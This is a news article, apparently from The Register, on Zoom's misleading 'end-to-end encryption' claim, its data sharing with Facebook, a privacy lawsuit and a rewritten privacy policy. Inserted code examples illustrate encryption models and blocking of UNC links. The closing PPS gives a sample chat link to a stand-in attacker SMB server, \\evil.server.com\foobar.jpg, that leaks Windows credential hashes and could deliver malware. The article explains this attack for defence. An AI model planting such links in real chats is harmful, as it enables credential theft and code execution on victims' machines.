
Zoom's end-to-end encryption isn't actually end-to-end at all. Good thing the PM isn't using it for Cabinet calls. Oh, for f...

Super-crypto actually normal TLS, lawsuit launched over Facebook API usage, privacy policy rewritten

UK Prime Minister Boris Johnson sparked security concerns on Tuesday when he shared a screenshot of “the first ever digital Cabinet” on his Twitter feed. It revealed the country’s most senior officials and ministers were using bog-standard Zoom to discuss critical issues facing Blighty.

The tweet also disclosed the Zoom meeting ID was 539-544-323, and fortunately that appears to have been password protected. That's a good thing because miscreants hijacking unprotected Zoom calls is a thing.

Crucially, the use of the Zoom software is likely to have infuriated the security services, while also raising questions about whether the UK government has its own secure video-conferencing facilities. We asked GCHQ, and it told us that it was a Number 10 issue. Downing Street declined to comment.

The decision to use Zoom, as millions of others stuck at home during the coronavirus outbreak are doing, comes as concerns are growing about the conferencing app's business model and security practices.

Most notably, the company has been forced to admit that although it explicitly gives users the option to hold an “end-to-end encrypted” conversation and touts end-to-end encryption as a key feature of its service, in fact it offers no such thing.

Specifically, it uses TLS, which underpins HTTPS website connections and is significantly better than nothing. But it most definitely is not end-to-end encryption (E2E). E2E ensures all communications are encrypted between devices so that not even the organization hosting the service has access to the contents of the connection. With TLS, Zoom can intercept and decrypt video chats and other data.

When we say end-to-end...

Despite Zoom offering a meeting host the option to “enable an end-to-end (E2E) encrypted meeting,” and providing a green padlock that claims “Zoom is using an end to end encrypted connection,” it appears that the company is able to access data in transit along that connection, and can also be compelled to provide it to governments. So, it's not E2E.

While that is not something that will bother most Zoom users, whose conversations are not highly sensitive nor confidential, for something like a UK Cabinet meeting, the lack of true end-to-end encryption is dangerous.

Under questioning, a Zoom spokesperson admitted: “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

Then they gave their own Zoom version of what the phrase “end-to-end encryption” actually means: “When we use the phrase ‘End to End’ in our other literature, it is in reference to the connection being encrypted from Zoom end point to Zoom end point,” a spokesperson told The Intercept on Tuesday.

The use of “end point” in this context refers to Zoom servers, not just Zoom clients; a second layer of purposefully misleading semantics.
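The difference between the two meanings of "end point" can be shown with a relay in the middle. The following is an added example, not Zoom's code or anything from the original article; it assumes, for model 1, that the server is the party that negotiates the AES key with each client over TLS, and the function names are hypothetical.

```javascript
// Added illustration (not Zoom's code): hop-by-hop vs end-to-end encryption.
const crypto = require('node:crypto');

// AES-256-GCM helpers; nonce and auth tag travel with the ciphertext.
function seal(key, text) {
  const iv = crypto.randomBytes(12);
  const c = crypto.createCipheriv('aes-256-gcm', key, iv);
  const body = Buffer.concat([c.update(text, 'utf8'), c.final()]);
  return { iv, body, tag: c.getAuthTag() };
}
// Returns the plaintext if `key` opens the packet, otherwise null.
function tryOpen(key, { iv, body, tag }) {
  try {
    const d = crypto.createDecipheriv('aes-256-gcm', key, iv);
    d.setAuthTag(tag);
    return Buffer.concat([d.update(body), d.final()]).toString('utf8');
  } catch { return null; } // GCM tag check failed: wrong key
}

// Model 1 (assumed): the server negotiates the AES media key with each client
// over TLS, so the server holds the same key the clients use.
function hopByHop(message) {
  const serverIssuedKey = crypto.randomBytes(32);
  const packet = seal(serverIssuedKey, message);
  return { serverSees: tryOpen(serverIssuedKey, packet),
           peerSees: tryOpen(serverIssuedKey, packet) };
}

// Model 2: clients agree a key with X25519; the server relays only public
// keys and ciphertext, and holds nothing but its own TLS session keys.
function endToEnd(message) {
  const alice = crypto.generateKeyPairSync('x25519');
  const bob = crypto.generateKeyPairSync('x25519');
  const derive = (priv, pub) => Buffer.from(crypto.hkdfSync('sha256',
    crypto.diffieHellman({ privateKey: priv, publicKey: pub }),
    Buffer.alloc(0), 'e2e-demo', 32));
  const packet = seal(derive(alice.privateKey, bob.publicKey), message);
  const serverTlsKey = crypto.randomBytes(32); // stand-in for any key the server holds
  return { serverSees: tryOpen(serverTlsKey, packet),
           peerSees: tryOpen(derive(bob.privateKey, alice.publicKey), packet) };
}

// Constructed sample message
console.log(hopByHop('constructed sample'), endToEnd('constructed sample'));
```

Model 2 still depends on the clients authenticating each other's public keys; a relay that can swap those keys undetected regains access to the plaintext.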

So when we say user privacy...

That’s not the only area where Zoom has been found wanting. As a spotlight has swung on the biz thanks to its enormous take-up in recent weeks, its dodgy data sharing policies were also revealed.

As we reported earlier this month, Zoom granted itself the right to mine your personal data and conference calls to target you with ads, and seemed to have a "creepily chummy" relationship with tracking-based advertisers.

Personal information gathered by the company included, but was not limited to, names, addresses and any other identifying data, job titles and employers, Facebook profiles, and device specifications. It also included "the content contained in cloud recordings, and instant messages, files, whiteboards ... shared while using the service."

In other words, it was, arguably, the Facebook of the video-conferencing world, sucking every piece of data it can from you and any device you install it on.

Speaking of Facebook, Zoom's iOS app sent analytics data to Facebook even if you didn't use Facebook to sign into Zoom, due to the application's use of the social network's Graph API, Vice discovered. The privacy policy stated the software collects profile information when a Facebook account is used to sign into Zoom, though it didn't say anything about what happens if you don't use Facebook. Zoom has since corrected its code to not send analytics to the social network if you don't use it to sign into the video-conferencing app.

Zoom also stupidly glommed users together, as if they were working for the same company, because they used a common email provider, such as xs4all.nl.

Privacy advocacy group Access Now, meanwhile, dug into Zoom’s privacy policy and practices and didn't like what it saw, sending a letter to the company on March 19 asking it to publish a transparency report along the same lines as other companies that made it plain exactly what the company was doing with its users’ data.

“The growing demand for Zoom’s services makes it a target for third parties, from law enforcement to malicious hackers, seeking personal data and sensitive information,” said Access Now’s general counsel Peter Micek. “This is why just disclosing privacy policies is not enough – it’s high time for Zoom to tell us how they protect our personal lives and professional activities from exploitation. This starts with a regular transparency report.”

The Facebook API kerfuffle resulted in a lawsuit [PDF], filed on Monday in California. The plaintiff in this case, Robert Cullen of Sacramento, California, is looking to bring a class action against Zoom for failing to protect personal data.

He argued Zoom has violated three Californian laws: the Unfair Competition Law, Consumers Legal Remedies Act, and Consumer Privacy Act by collecting and providing personal information to third parties including Facebook.

“Had Zoom informed its users that it would use inadequate security measures and permit unauthorized third-party tracking of their personal information, users would not have been willing to use the Zoom app,” the lawsuit argued.

In short, while Zoom’s ease of use, reliability and excellent user interface have made it a godsend for people stuck at home, the company continues to raise red flags about its honesty, its privacy policies and its business model. That is something a country’s head of government would do well to consider before posting screengrabs of online meetings. ®

Stop press... Zoom has quietly rewritten its privacy policy since our earlier coverage to now stress: "We do not sell your personal data. Whether you are a business or a school or an individual user, we do not sell your data."

It continued: "Your meetings are yours. We do not monitor them or even store them after your meeting is done unless we are requested to record and store them by the meeting host ... We do not use data we obtain from your use of our services, including your meetings, for any advertising. We do use data we obtain from you when you visit our marketing websites, such as zoom.us and zoom.com. You have control over your own cookie settings when visiting our marketing websites."

It thus appears to have clarified, among other things, that it does not, at least now, use the content of meetings and messages to generate targeted advertising.

PS: Zoom has an attention-tracking feature, which can be turned on by a meeting host, that alerts the host if you click away from the Zoom conference for more than 30 seconds.

PPS: It appears you can snaffle people's Windows local login usernames and hashed passwords via Zoom by getting them to click on a URL in a chat message that connects to a malicious SMB file server. A link such as \\evil.server.com\foobar.jpg will, when clicked on, cause Windows to connect to evil.server.com, supplying the logged-in user's credentials in hope of fetching foobar.jpg. Swap foobar.jpg for malware.exe and you could get code execution on the victim's computer.
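On the defensive side, a chat client can refuse to turn UNC paths into clickable links in the first place. The following is an added example, not Zoom's code or its actual fix; the function names and the sample message are constructed for illustration.

```javascript
// Added illustration: decide which chat tokens a client may render as
// clickable links. UNC paths (\\host\share\file) are never linkified, because
// opening one makes Windows start an SMB connection to the named host.

// Matches \\host\path tokens; capture 1 is the remote host, capture 2 the path.
const UNC_PATH = /^\\\\([^\\\/\s]+)\\(\S*)$/;

function classifyToken(token) {
  const unc = UNC_PATH.exec(token);
  if (unc) {
    // Keep the text visible but inert, and record the host for alerting.
    return { kind: 'blocked-unc', text: token, host: unc[1].toLowerCase() };
  }
  try {
    const u = new URL(token);
    // Allow-list of schemes: anything else (file:, smb:, ...) stays plain text.
    if (u.protocol === 'http:' || u.protocol === 'https:') {
      return { kind: 'link', text: token, host: u.hostname };
    }
  } catch { /* not a URL: fall through to plain text */ }
  return { kind: 'text', text: token };
}

// Splits a message on whitespace and returns the render decision per token
// plus the list of remote hosts named in blocked UNC paths.
function renderPlan(message) {
  const segments = message.split(/\s+/).filter(Boolean).map(classifyToken);
  const flaggedHosts = segments
    .filter((s) => s.kind === 'blocked-unc')
    .map((s) => s.host);
  return { segments, flaggedHosts };
}

// Constructed sample message using the host name from the paragraph above.
const SAMPLE = String.raw`see \\evil.server.com\foobar.jpg and https://zoom.us/j/1 thanks`;
console.log(renderPlan(SAMPLE));
```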
